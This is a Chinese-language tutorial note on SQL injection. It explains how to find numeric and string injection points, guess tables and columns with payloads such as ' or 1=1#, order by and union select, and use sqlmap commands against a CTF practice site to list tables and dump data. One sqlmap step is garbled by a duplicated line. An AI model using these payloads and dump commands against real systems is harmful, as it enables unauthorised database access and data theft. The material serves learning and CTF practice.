一、基础

1. 定义

SQL注入是一种利用未过滤/未审核用户输入的攻击方法（“缓存溢出”和这个不同），意思就是让应用运行本不应该运行的SQL代码。如果应用毫无防备地创建了SQL字符串并且运行了它们，就会造成一些出人意料的结果。
【自行理解：只要有要求用户输入的地方，就会有连接数据库的操作，由于用户可以输入任何东西，所以就能也能输入sql代码来搞破坏】

2. 分类

• 数字型：select * from <表名> where id = 1
• 字符型：select * from <表名> where id = 'x'

3. 一般流程

step1:寻找注入点

找到网站中传递参数的地方，比如按编号查询商品的页面，如http://xxx/xxx.php?id= 45再进行判断

• 数字型
  step1:在url中输入http://xxx/xxx.php?id=x and 1=1页面正常，则进入下一步
  step2: 再输入http://xxx/xxx.php?id=x and 1=2页面出错，则说明存在数字型注入
  （原因：若是字符型注入，那么
  真正执行的sql语句其实是select * from <表名> where id = 'x and 1=2'这样的，并不会存在逻辑判断）
  补充判断

• 字符型
  step1:在url中输入http://xxx/xxx.php?id=x' and '1'='1页面正常，则进入下一步
  step2: 再输入http://xxx/xxx.php?id=x' and '1'='2页面出错，则说明存在字符型注入
  补充

step2:猜解数据库字段

猜解原理：以dvwa为例
源码：$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
我们要做的就是通过控制user_id的输入达到获取数据库中信息的目的，比如输入' or 1=1#则真正执行的sql语句是
SELECT first_name, last_name FROM users WHERE user_id = '' or 1=1#`;
这里' or 1=1#也叫万能密码，原理很简单，对于执行的sql语句，user_id传入什么不要紧，后面的1=1永远成立，再注意加注释#表示把后面的 `去掉，根据or运算的性质，有一个条件为真，这句话就可以执行

• 你猜有没有xxx表？--- ' or exists (select * from xxx)#
• 你猜xxx表里有几个字段呀？--- 1' order by N#
  （注：order by N的意思是按表中第N字段排列，其中N就是你要试的数，如果表里有2个字段，则执行order by 1和order by 2都正常，而执行order by 3出错）
• 你猜表里的字段都有那些呀？--- 1' unoin select x1,x2 from 表名
  （注1：Union查询可查询两个及以上字段，若上一步判断得表中主查询列数为2,则每次使union查询两项）
  （注2：常用查询
  database()将会返回当前网站所使用的数据库名字.
  user()将会返回执行当前查询的用户名.
  version() 获取当前数据库版本.
  @@version_compile_os 获取当前操作系统。
  table_name 数据库中其他表
  table_schema 数据库的模式
  username 用户名
  password 密码）

二、使用神器sqlmap

1.爆当前数据库名：sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db

2.爆表名: -D 指定上一步爆出的数据库名 my_db

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables

3.爆列名(字段名), -T 指定上一步爆出的表名 admin

sqlmap -u "爆列名(字段名), -T 指定上一步爆出的表名 admin

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns --no-cast

4.爆字段中存储的数据值:使用-D my_db -T thiskey -C k0y --dump 参数得到值

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump